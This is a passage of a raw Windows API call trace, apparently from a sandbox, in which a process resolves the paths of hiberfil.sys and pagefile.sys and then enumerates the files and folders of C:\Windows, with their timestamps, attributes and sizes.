SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e25c) returned 1 [0246.629] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0246.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.635] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0246.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x0) returned 0xb [0246.635] FindFirstFileW (in: lpFileName="C:\\Windows\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.635] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.635] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800b91b1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80b6f4c5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80b6f4c5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="addins", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdb0c77c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfdb0c77c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppCompat", cAlternateFileName="APPCOM~1")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb328d6, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57087b83, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x57087b83, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppPatch", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x15, ftCreationTime.dwLowDateTime=0xfdb58a30, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe968e7e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe968e7e0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="assembly", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97675415, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x97675415, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x977f21d7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11600, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfsvc.exe", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfde52538, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x5562e640, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x5562e640, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0xafd68640, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootstat.dat", cAlternateFileName="")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe36132c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Branding", cAlternateFileName="")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98abb4cc, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x61766720, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x61766720, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CSC", cAlternateFileName="")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe36132c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x806ac8bc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x806ac8bc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cursors", cAlternateFileName="")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8a36d94, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x181cd0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x181cd0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="debug", cAlternateFileName="")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800b91b1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x800b91b1, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x800b91b1, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="diagnostics", cAlternateFileName="DIAGNO~1")) returned 1 [0246.637] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3763cf0c, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa9eeab22, ftLastAccessTime.dwHighDateTime=0x1cbf8e9, ftLastWriteTime.dwLowDateTime=0x3763cf0c, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigitalLocker", cAlternateFileName="DIGITA~1")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x806ac8bc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x806ac8bc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloaded Program Files", cAlternateFileName="DOWNLO~1")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffb94625, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xffb94625, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x7a349200, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0xae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="DtcInstall.log", cAlternateFileName="DTCINS~1.LOG")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x996cd9eb, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xa9fa1e6a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9cf49440, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ehome", cAlternateFileName="")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3757e82b, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x23fb0799, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e423fe3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cd4312, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x90cd4312, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x90d6c893, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2bd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="explorer.exe", cAlternateFileName="")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x15, ftCreationTime.dwLowDateTime=0xfe387486, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6d0f7050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0f7050, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0246.639] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a7e9b0, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0xc0a7e9b0, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0xe2da8a60, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fveupdate.exe", cAlternateFileName="")) returned 1 [0246.639] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe387486, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe9340f25, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xe9340f25, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Globalization", cAlternateFileName="GLOBAL~1")) returned 1 [0246.639] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe3f9894, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d967bdb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d967bdb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0246.639] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a5a972, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x34a5a972, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xe391cc70, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="HelpPane.exe", cAlternateFileName="")) returned 1 [0246.639] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ca6ff3, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x16ca6ff3, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xe391cc70, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hh.exe", cAlternateFileName="")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe445b48, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3763cf0c, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3763cf0c, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME", cAlternateFileName="")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe50420a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5916ec90, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x5916ec90, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="inf", cAlternateFileName="")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x72a697c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xeda8bc40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xeda8bc40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Installer", cAlternateFileName="INSTAL~1")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe60eb80, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80b6f4c5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80b6f4c5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L2Schemas", cAlternateFileName="L2SCHE~1")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe60eb80, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfe60eb80, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9a0a5fd1, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LiveKernelReports", cAlternateFileName="LIVEKE~1")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe60eb80, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6938ae40, ftLastAccessTime.dwHighDateTime=0x1d2fafa, ftLastWriteTime.dwLowDateTime=0x6938ae40, ftLastWriteTime.dwHighDateTime=0x1d2fafa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x15, ftCreationTime.dwLowDateTime=0xfe60eb80, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8105822e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8105822e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media", cAlternateFileName="")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f29dbd7, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x7f29dbd7, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9d4aec0c, ftLastWriteTime.dwHighDateTime=0x1ca040e, nFileSizeHigh=0x0, nFileSizeLow=0xa87b, dwReserved0=0x0, dwReserved1=0x0, cFileName="mib.bin", cAlternateFileName="")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe6f339c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd0be0600, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xd0be0600, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56a9ce00, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56a9ce00, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56a9ce00, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Migration", cAlternateFileName="MIGRAT~1")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfea5f2b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfea5f2b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0x9fcbcbb0, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ModemLogs", cAlternateFileName="MODEML~1")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc82fedc8, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc82fedc8, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x2d6b0bf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x57d, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.ini", cAlternateFileName="")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb2c4cd, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x8eb2c4cd, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb804920, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f400, dwReserved0=0x0, dwReserved1=0x0, cFileName="notepad.exe", cAlternateFileName="")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x810320ce, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x810320ce, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Offline Web Pages", cAlternateFileName="OFFLIN~1")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3172800, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x281b0dc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x281b0dc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Panther", cAlternateFileName="")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, 